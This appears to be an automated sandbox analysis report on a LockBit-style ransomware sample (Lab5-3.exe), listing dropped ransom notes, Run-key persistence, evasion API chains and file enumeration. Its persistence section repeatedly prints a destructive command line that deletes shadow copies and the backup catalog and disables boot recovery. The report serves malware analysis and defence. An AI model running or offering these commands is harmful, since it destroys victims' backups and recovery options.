                      Source: C:\Users\user\Desktop\Lab5-3.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\sample-files\js\nls\ru-ru\Restore-My-Files.txtJump to behavior
                      Source: C:\Users\user\Desktop\Lab5-3.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\sample-files\js\nls\sk-sk\Restore-My-Files.txtJump to behavior
                      Source: C:\Users\user\Desktop\Lab5-3.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\sample-files\js\nls\sl-si\Restore-My-Files.txtJump to behavior
                      Source: C:\Users\user\Desktop\Lab5-3.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\sample-files\js\nls\sv-se\Restore-My-Files.txtJump to behavior
                      Source: C:\Users\user\Desktop\Lab5-3.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\sample-files\js\nls\tr-tr\Restore-My-Files.txtJump to behavior
                      Source: C:\Users\user\Desktop\Lab5-3.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\sample-files\js\nls\Restore-My-Files.txtJump to behavior
                      Source: C:\Users\user\Desktop\Lab5-3.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\sample-files\js\nls\uk-ua\Restore-My-Files.txtJump to behavior
                      Source: C:\Users\user\Desktop\Lab5-3.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\sample-files\js\nls\zh-cn\Restore-My-Files.txtJump to behavior
                      Source: C:\Users\user\Desktop\Lab5-3.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\sample-files\js\nls\zh-tw\Restore-My-Files.txtJump to behavior
                      Source: C:\Users\user\Desktop\Lab5-3.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\sample-files\js\Restore-My-Files.txtJump to behavior
                      Source: C:\Users\user\Desktop\Lab5-3.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\scan-files\css\Restore-My-Files.txtJump to behavior
                      Source: C:\Users\user\Desktop\Lab5-3.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\scan-files\images\themeless\Restore-My-Files.txtJump to behavior
                      Source: C:\Users\user\Desktop\Lab5-3.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\scan-files\images\themeless\Appstore\Restore-My-Files.txtJump to behavior
                      Source: C:\Users\user\Desktop\Lab5-3.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\scan-files\images\themeless\Playstore\Restore-My-Files.txtJump to behavior
                      Source: C:\Users\user\Desktop\Lab5-3.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\scan-files\js\nls\ca-es\Restore-My-Files.txtJump to behavior
                      Source: C:\Users\user\Desktop\Lab5-3.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\scan-files\js\nls\cs-cz\Restore-My-Files.txtJump to behavior
                      Source: C:\Users\user\Desktop\Lab5-3.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\scan-files\js\nls\da-dk\Restore-My-Files.txtJump to behavior
                      Source: C:\Users\user\Desktop\Lab5-3.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\scan-files\js\nls\de-de\Restore-My-Files.txtJump to behavior
                      Source: C:\Users\user\Desktop\Lab5-3.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\scan-files\js\nls\en-ae\Restore-My-Files.txtJump to behavior
                      Source: C:\Users\user\Desktop\Lab5-3.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\scan-files\js\nls\en-il\Restore-My-Files.txtJump to behavior
                      Source: C:\Users\user\Desktop\Lab5-3.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\scan-files\js\nls\es-es\Restore-My-Files.txtJump to behavior
                      Source: Binary string: D:\T\BuildResults\bin\Release_x64\plug_ins\MakeAccessible.pdb source: MakeAccessible.api.lockbit.27.dr
                      Source: Binary string: D:\T\BuildResults\bin\Release_x64\plug_ins\MakeAccessible.pdb< source: MakeAccessible.api.lockbit.27.dr
                      Source: Binary string: D:\T\BuildResults\bin\Release_x64\plug_ins\ReadOutLoud.pdb source: Lab5-3.exe, 0000001B.00000003.2122488280.000000001C330000.00000004.00000020.00020000.00000000.sdmp
                      Source: Binary string: d:\dbs\sh\odct\1105_210049_0\client\onedrive\Setup\Standalone\exe\obj\i386\OneDriveSetup.pdb source: wctF86A.tmp.lockbit.0.dr
                      Source: Lab5-3.exeStatic PE information: real checksum: 0x27126 should be: 0x26cfd
                      Source: C:\Users\user\Desktop\Lab5-3.exeCode function: 19_2_00407DF0 push eax; ret 19_2_00407E04
                      Source: C:\Users\user\Desktop\Lab5-3.exeCode function: 19_2_00407DF0 push eax; ret 19_2_00407E2C
                      Source: C:\Users\user\Desktop\Lab5-3.exeCode function: 27_2_00407DF0 push eax; ret 27_2_00407E04
                      Source: C:\Users\user\Desktop\Lab5-3.exeCode function: 27_2_00407DF0 push eax; ret 27_2_00407E2C

                      Persistence and Installation Behavior

                      barindex
                      Source: C:\Users\user\Desktop\Lab5-3.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c vssadmin delete shadows /all /quiet & wmic shadowcopy delete & bcdedit /set {default} bootstatuspolicy ignoreallfailures & bcdedit /set {default} recoveryenabled no & wbadmin delete catalog -quiet
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\bcdedit.exe bcdedit /set {default} bootstatuspolicy ignoreallfailures
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\bcdedit.exe bcdedit /set {default} recoveryenabled no
                      Source: C:\Users\user\Desktop\Lab5-3.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c vssadmin delete shadows /all /quiet & wmic shadowcopy delete & bcdedit /set {default} bootstatuspolicy ignoreallfailures & bcdedit /set {default} recoveryenabled no & wbadmin delete catalog -quiet
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\bcdedit.exe bcdedit /set {default} bootstatuspolicy ignoreallfailures
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\bcdedit.exe bcdedit /set {default} recoveryenabled no
                      Source: C:\Users\user\Desktop\Lab5-3.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c vssadmin delete shadows /all /quiet & wmic shadowcopy delete & bcdedit /set {default} bootstatuspolicy ignoreallfailures & bcdedit /set {default} recoveryenabled no & wbadmin delete catalog -quiet
                      Source: C:\Users\user\Desktop\Lab5-3.exeProcess created: C:\Windows\System32\cmd.exe /c bcdedit /set {default} recoveryenabled No
                      Source: C:\Users\user\Desktop\Lab5-3.exeProcess created: C:\Windows\System32\cmd.exe /c bcdedit /set {default} bootstatuspolicy ignoreallfailures
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\bcdedit.exe bcdedit /set {default} recoveryenabled No
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\bcdedit.exe bcdedit /set {default} bootstatuspolicy ignoreallfailures
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\bcdedit.exe bcdedit /set {default} recoveryenabled no
                      Source: C:\Users\user\Desktop\Lab5-3.exeProcess created: C:\Windows\System32\cmd.exe /c bcdedit /set {default} recoveryenabled No
                      Source: C:\Users\user\Desktop\Lab5-3.exeProcess created: C:\Windows\System32\cmd.exe /c bcdedit /set {default} bootstatuspolicy ignoreallfailures
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\bcdedit.exe bcdedit /set {default} recoveryenabled No
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\bcdedit.exe bcdedit /set {default} bootstatuspolicy ignoreallfailures
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\bcdedit.exe bcdedit /set {default} bootstatuspolicy ignoreallfailures
                      Source: C:\Users\user\Desktop\Lab5-3.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c vssadmin delete shadows /all /quiet & wmic shadowcopy delete & bcdedit /set {default} bootstatuspolicy ignoreallfailures & bcdedit /set {default} recoveryenabled no & wbadmin delete catalog -quietJump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\bcdedit.exe bcdedit /set {default} bootstatuspolicy ignoreallfailures
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\bcdedit.exe bcdedit /set {default} recoveryenabled no
                      Source: C:\Users\user\Desktop\Lab5-3.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c vssadmin delete shadows /all /quiet & wmic shadowcopy delete & bcdedit /set {default} bootstatuspolicy ignoreallfailures & bcdedit /set {default} recoveryenabled no & wbadmin delete catalog -quiet
                      Source: C:\Users\user\Desktop\Lab5-3.exeProcess created: C:\Windows\System32\cmd.exe /c bcdedit /set {default} recoveryenabled No
                      Source: C:\Users\user\Desktop\Lab5-3.exeProcess created: C:\Windows\System32\cmd.exe /c bcdedit /set {default} bootstatuspolicy ignoreallfailures
                      Source: C:\Users\user\Desktop\Lab5-3.exeProcess created: C:\Windows\System32\bcdedit.exe bcdedit /set {default} recoveryenabled No
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\bcdedit.exe bcdedit /set {default} bootstatuspolicy ignoreallfailures
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\bcdedit.exe bcdedit /set {default} recoveryenabled no
                      Source: C:\Users\user\Desktop\Lab5-3.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c vssadmin delete shadows /all /quiet & wmic shadowcopy delete & bcdedit /set {default} bootstatuspolicy ignoreallfailures & bcdedit /set {default} recoveryenabled no & wbadmin delete catalog -quiet
                      Source: C:\Users\user\Desktop\Lab5-3.exeProcess created: C:\Windows\System32\cmd.exe /c bcdedit /set {default} recoveryenabled No
                      Source: C:\Users\user\Desktop\Lab5-3.exeProcess created: C:\Windows\System32\cmd.exe /c bcdedit /set {default} bootstatuspolicy ignoreallfailures
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\bcdedit.exe bcdedit /set {default} bootstatuspolicy ignoreallfailures
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\bcdedit.exe bcdedit /set {default} recoveryenabled no
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\bcdedit.exe bcdedit /set {default} recoveryenabled No
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\bcdedit.exe bcdedit /set {default} bootstatuspolicy ignoreallfailures
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\bcdedit.exe bcdedit /set {default} recoveryenabled No
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\bcdedit.exe bcdedit /set {default} bootstatuspolicy ignoreallfailures
                      Source: C:\Users\user\Desktop\Lab5-3.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run XO1XADpO01Jump to behavior
                      Source: C:\Users\user\Desktop\Lab5-3.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run XO1XADpO01Jump to behavior

                      Hooking and other Techniques for Hiding and Protection

                      barindex
                      Source: C:\Windows\System32\wbengine.exeFile created: C:\System Volume Information\WindowsImageBackup
                      Source: C:\Users\user\Desktop\Lab5-3.exeRegistry key monitored for changes: HKEY_CURRENT_USER_Classes
                      Source: C:\Users\user\Desktop\Lab5-3.exeProcess information set: FAILCRITICALERRORS | NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Lab5-3.exeProcess information set: FAILCRITICALERRORS | NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Lab5-3.exeProcess information set: FAILCRITICALERRORS | NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Lab5-3.exeProcess information set: FAILCRITICALERRORS | NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Lab5-3.exeProcess information set: FAILCRITICALERRORS | NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Lab5-3.exeProcess information set: FAILCRITICALERRORS | NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Lab5-3.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Lab5-3.exeProcess information set: FAILCRITICALERRORS | NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Lab5-3.exeProcess information set: FAILCRITICALERRORS | NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Lab5-3.exeProcess information set: FAILCRITICALERRORS | NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Lab5-3.exeProcess information set: FAILCRITICALERRORS | NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Lab5-3.exeProcess information set: FAILCRITICALERRORS | NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Lab5-3.exeProcess information set: FAILCRITICALERRORS | NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Lab5-3.exeProcess information set: FAILCRITICALERRORS | NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Lab5-3.exeProcess information set: FAILCRITICALERRORS | NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOXJump to behavior
                      Source: C:\Windows\System32\wbem\WMIC.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\vds.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\Lab5-3.exeProcess information set: FAILCRITICALERRORS | NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOX
                      Source: C:\Users\user\Desktop\Lab5-3.exeProcess information set: FAILCRITICALERRORS | NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOX
                      Source: C:\Users\user\Desktop\Lab5-3.exeProcess information set: FAILCRITICALERRORS | NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOX
                      Source: C:\Users\user\Desktop\Lab5-3.exeProcess information set: FAILCRITICALERRORS | NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOX
                      Source: C:\Users\user\Desktop\Lab5-3.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\Lab5-3.exeProcess information set: FAILCRITICALERRORS | NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOX
                      Source: C:\Users\user\Desktop\Lab5-3.exeProcess information set: FAILCRITICALERRORS | NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOX
                      Source: C:\Users\user\Desktop\Lab5-3.exeProcess information set: FAILCRITICALERRORS | NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOX
                      Source: C:\Users\user\Desktop\Lab5-3.exeProcess information set: FAILCRITICALERRORS | NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOX
                      Source: C:\Users\user\Desktop\Lab5-3.exeProcess information set: FAILCRITICALERRORS | NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOX
                      Source: C:\Users\user\Desktop\Lab5-3.exeProcess information set: FAILCRITICALERRORS | NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOX
                      Source: C:\Users\user\Desktop\Lab5-3.exeProcess information set: FAILCRITICALERRORS | NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOX
                      Source: C:\Users\user\Desktop\Lab5-3.exeProcess information set: FAILCRITICALERRORS | NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOX
                      Source: C:\Windows\System32\wbem\WMIC.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\Lab5-3.exeProcess information set: FAILCRITICALERRORS | NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOX
                      Source: C:\Users\user\Desktop\Lab5-3.exeProcess information set: FAILCRITICALERRORS | NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOX
                      Source: C:\Users\user\Desktop\Lab5-3.exeProcess information set: FAILCRITICALERRORS | NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOX
                      Source: C:\Users\user\Desktop\Lab5-3.exeProcess information set: FAILCRITICALERRORS | NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOX
                      Source: C:\Users\user\Desktop\Lab5-3.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\Lab5-3.exeProcess information set: FAILCRITICALERRORS | NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOX
                      Source: C:\Users\user\Desktop\Lab5-3.exeProcess information set: FAILCRITICALERRORS | NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOX
                      Source: C:\Users\user\Desktop\Lab5-3.exeProcess information set: FAILCRITICALERRORS | NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOX
                      Source: C:\Users\user\Desktop\Lab5-3.exeProcess information set: FAILCRITICALERRORS | NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOX
                      Source: C:\Users\user\Desktop\Lab5-3.exeProcess information set: FAILCRITICALERRORS | NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOX
                      Source: C:\Users\user\Desktop\Lab5-3.exeProcess information set: FAILCRITICALERRORS | NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOX
                      Source: C:\Users\user\Desktop\Lab5-3.exeProcess information set: FAILCRITICALERRORS | NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOX
                      Source: C:\Users\user\Desktop\Lab5-3.exeProcess information set: FAILCRITICALERRORS | NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOX
                      Source: C:\Windows\System32\cmd.exeProcess information set: FAILCRITICALERRORS | NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOX
                      Source: C:\Windows\System32\wbem\WMIC.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\cmd.exeProcess information set: FAILCRITICALERRORS | NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOX
                      Source: C:\Windows\System32\cmd.exeProcess information set: FAILCRITICALERRORS | NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOX
                      Source: C:\Windows\System32\cmd.exeProcess information set: FAILCRITICALERRORS | NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOX
                      Source: C:\Windows\System32\cmd.exeProcess information set: FAILCRITICALERRORS | NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOX
                      Source: C:\Windows\System32\cmd.exeProcess information set: FAILCRITICALERRORS | NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOX
                      Source: C:\Windows\System32\cmd.exeProcess information set: FAILCRITICALERRORS | NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOX
                      Source: C:\Windows\System32\cmd.exeProcess information set: FAILCRITICALERRORS | NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOX
                      Source: C:\Windows\System32\cmd.exeProcess information set: FAILCRITICALERRORS | NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOX
                      Source: C:\Windows\System32\cmd.exeProcess information set: FAILCRITICALERRORS | NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOX
                      Source: C:\Windows\System32\cmd.exeProcess information set: FAILCRITICALERRORS | NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOX

                      Malware Analysis System Evasion

                      barindex
                      Source: C:\Users\user\Desktop\Lab5-3.exeEvasive API call chain: CreateMutex,DecisionNodes,ExitProcessgraph_19-4426
                      Source: C:\Users\user\Desktop\Lab5-3.exeEvasive API call chain: GetPEB, DecisionNodes, ExitProcessgraph_19-4280
                      Source: C:\Windows\System32\vds.exeFile opened / queried: scsi#disk&ven_vmware&prod_virtual_disk#4&1656f219&0&000000#{53f56307-b6bf-11d0-94f2-00a0c91efb8b}
                      Source: C:\Users\user\Desktop\Lab5-3.exeCode function: 19_2_00416710 CreateToolhelp32Snapshot,CloseHandle,Process32First,GetCurrentProcessId,OpenProcess,TerminateProcess,CloseHandle,Process32Next,CloseHandle,GetCurrentProcessId,OpenProcess,TerminateProcess,CloseHandle,19_2_00416710
                      Source: C:\Users\user\Desktop\Lab5-3.exeCode function: Sleep,malloc,malloc,GetAdaptersInfo,GetAdaptersInfo,free,malloc,GetAdaptersInfo,lstrcmpiA,PathRemoveExtensionA,wsprintfA,lstrcmpiA,malloc,malloc,RtlInterlockedPushEntrySList,free,19_2_0041A130
                      Source: C:\Users\user\Desktop\Lab5-3.exeCode function: NetApiBufferFree,malloc,malloc,GetAdaptersInfo,GetAdaptersInfo,free,malloc,GetAdaptersInfo,lstrcmpiA,PathRemoveExtensionA,wsprintfA,lstrcmpiA,malloc,malloc,RtlInterlockedPushEntrySList,free,27_2_0041A130
                      Source: C:\Users\user\Desktop\Lab5-3.exeWindow / User API: threadDelayed 1741Jump to behavior
                      Source: C:\Users\user\Desktop\Lab5-3.exeWindow / User API: threadDelayed 4663Jump to behavior
                      Source: C:\Users\user\Desktop\Lab5-3.exeWindow / User API: threadDelayed 2654
                      Source: C:\Users\user\Desktop\Lab5-3.exeWindow / User API: threadDelayed 2685
                      Source: C:\Windows\System32\conhost.exeWindow / User API: threadDelayed 363
                      Source: C:\Users\user\Desktop\Lab5-3.exeWindow / User API: threadDelayed 3455
                      Source: C:\Users\user\Desktop\Lab5-3.exeWindow / User API: threadDelayed 2691
                      Source: C:\Users\user\Desktop\Lab5-3.exeEvaded block: after key decisiongraph_19-4295
                      Source: C:\Users\user\Desktop\Lab5-3.exeEvasive API call chain: GetLocalTime,DecisionNodesgraph_19-4409
                      Source: C:\Users\user\Desktop\Lab5-3.exeEvasive API call chain: RegQueryValue,DecisionNodes,Sleepgraph_19-4738
                      Source: C:\Users\user\Desktop\Lab5-3.exeCheck user administrative privileges: GetTokenInformation,DecisionNodesgraph_19-4310
                      Source: C:\Users\user\Desktop\Lab5-3.exeAPI coverage: 8.0 %
                      Source: C:\Users\user\Desktop\Lab5-3.exe TID: 7480Thread sleep time: -466300s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\Lab5-3.exe TID: 7200Thread sleep count: 330 > 30
                      Source: C:\Users\user\Desktop\Lab5-3.exe TID: 7200Thread sleep count: 233 > 30
                      Source: C:\Users\user\Desktop\Lab5-3.exe TID: 9648Thread sleep count: 334 > 30
                      Source: C:\Users\user\Desktop\Lab5-3.exe TID: 9648Thread sleep time: -33400s >= -30000s
                      Source: C:\Users\user\Desktop\Lab5-3.exe TID: 9980Thread sleep count: 2654 > 30
                      Source: C:\Users\user\Desktop\Lab5-3.exe TID: 9980Thread sleep count: 49 > 30
                      Source: C:\Users\user\Desktop\Lab5-3.exe TID: 9648Thread sleep count: 2685 > 30
                      Source: C:\Users\user\Desktop\Lab5-3.exe TID: 9648Thread sleep time: -268500s >= -30000s
                      Source: C:\Users\user\Desktop\Lab5-3.exe TID: 11192Thread sleep time: -345500s >= -30000s
                      Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                      Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                      Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                      Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                      Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                      Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                      Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                      Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                      Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                      Source: C:\Users\user\Desktop\Lab5-3.exeThread sleep count: Count: 1741 delay: -3Jump to behavior
                      Source: C:\Users\user\Desktop\Lab5-3.exeThread sleep count: Count: 2654 delay: -3
                      Source: C:\Users\user\Desktop\Lab5-3.exeThread sleep count: Count: 2691 delay: -3
                      Source: C:\Users\user\Desktop\Lab5-3.exeCode function: 19_2_0040F630 GetLocalTime followed by cmp: cmp ecx, 11h and CTI: jc 0040F6F0h19_2_0040F630
                      Source: C:\Users\user\Desktop\Lab5-3.exeCode function: 27_2_0040F630 GetLocalTime followed by cmp: cmp ecx, 11h and CTI: jc 0040F6F0h27_2_0040F630
                      Source: C:\Users\user\Desktop\Lab5-3.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Lab5-3.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Lab5-3.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Lab5-3.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Lab5-3.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Lab5-3.exeFile Volume queried: C:\ FullSizeInformation
                      Source: C:\Users\user\Desktop\Lab5-3.exeFile Volume queried: C:\ FullSizeInformation
                      Source: C:\Users\user\Desktop\Lab5-3.exeFile Volume queried: C:\ FullSizeInformation
                      Source: C:\Users\user\Desktop\Lab5-3.exeFile Volume queried: C:\ FullSizeInformation
                      Source: C:\Users\user\Desktop\Lab5-3.exeFile Volume queried: C:\ FullSizeInformation
                      Source: C:\Users\user\Desktop\Lab5-3.exeFile Volume queried: C:\ FullSizeInformation
                      Source: C:\Users\user\Desktop\Lab5-3.exeCode function: 19_2_00410170 NetApiBufferFree,RtlEnterCriticalSection,lstrcmpiW,lstrcmpiW,wsprintfW,wsprintfW,FindFirstFileExW,RtlLeaveCriticalSection,ExitThread,FindClose,wsprintfW,CreateFileW,RtlLeaveCriticalSection,ExitThread,malloc,RtlLeaveCriticalSection,SHEmptyRecycleBinW,GetDiskFreeSpaceExW,SetThreadUILanguage,StrFormatByteSize64A,StrFormatByteSize64A,StrFormatByteSize64A,wsprintfA,CloseHandle,DeleteFileW,ExitThread,19_2_00410170
                      Source: C:\Users\user\Desktop\Lab5-3.exeCode function: 19_2_00410530 GetFileAttributesW,SetFileAttributesW,wsprintfW,FindFirstFileExW,FindNextFileW,lstrcmpiW,lstrcmpiW,lstrcmpiW,lstrcmpiW,lstrcmpiW,lstrcmpiW,lstrcmpiW,lstrcmpiW,lstrcmpiW,lstrcmpiW,lstrcmpiW,lstrcmpiW,lstrcmpiW,lstrcmpiW,lstrcmpiW,lstrcmpiW,lstrcmpiW,lstrcmpiW,lstrcmpiW,lstrcmpiW,lstrcmpiW,lstrcmpiW,lstrcmpiW,lstrcmpiW,lstrcmpiW,lstrcmpiW,wsprintfW,PathFindExtensionW,lstrcmpiW,lstrcmpiW,lstrcmpiW,lstrcmpiW,lstrcmpiW,lstrcmpiW,lstrcmpiW,lstrcmpiW,lstrcmpiW,lstrcmpiW,lstrcmpiW,lstrcmpiW,lstrcmpiW,lstrcmpiW,lstrcmpiW,lstrcmpiW,lstrcmpiW,lstrcmpiW,lstrcmpiW,lstrcmpiW,lstrcmpiW,lstrcmpiW,lstrcmpiW,lstrcmpiW,lstrcmpiW,lstrcmpiW,lstrcmpiW,lstrcmpiW,lstrcmpiW,lstrcmpiW,lstrcmpiW,lstrcmpiW,lstrcmpiW,lstrcmpiW,lstrcmpiW,lstrcmpiW,lstrcmpiW,lstrcmpiW,lstrcmpiW,lstrcmpiW,lstrcmpiW,lstrcmpiW,lstrcmpiW,lstrcmpiW,lstrcmpiW,lstrcmpiW,lstrcmpiW,lstrcmpiW,lstrcmpiW,lstrcmpiW,lstrcmpiW,lstrcmpiW,lstrcmpiW,lstrcmpiW,PathAddBackslashW,SetFileAttributesW,FindNextFileW,FindNextFileW,FindClose,19_2_00410530
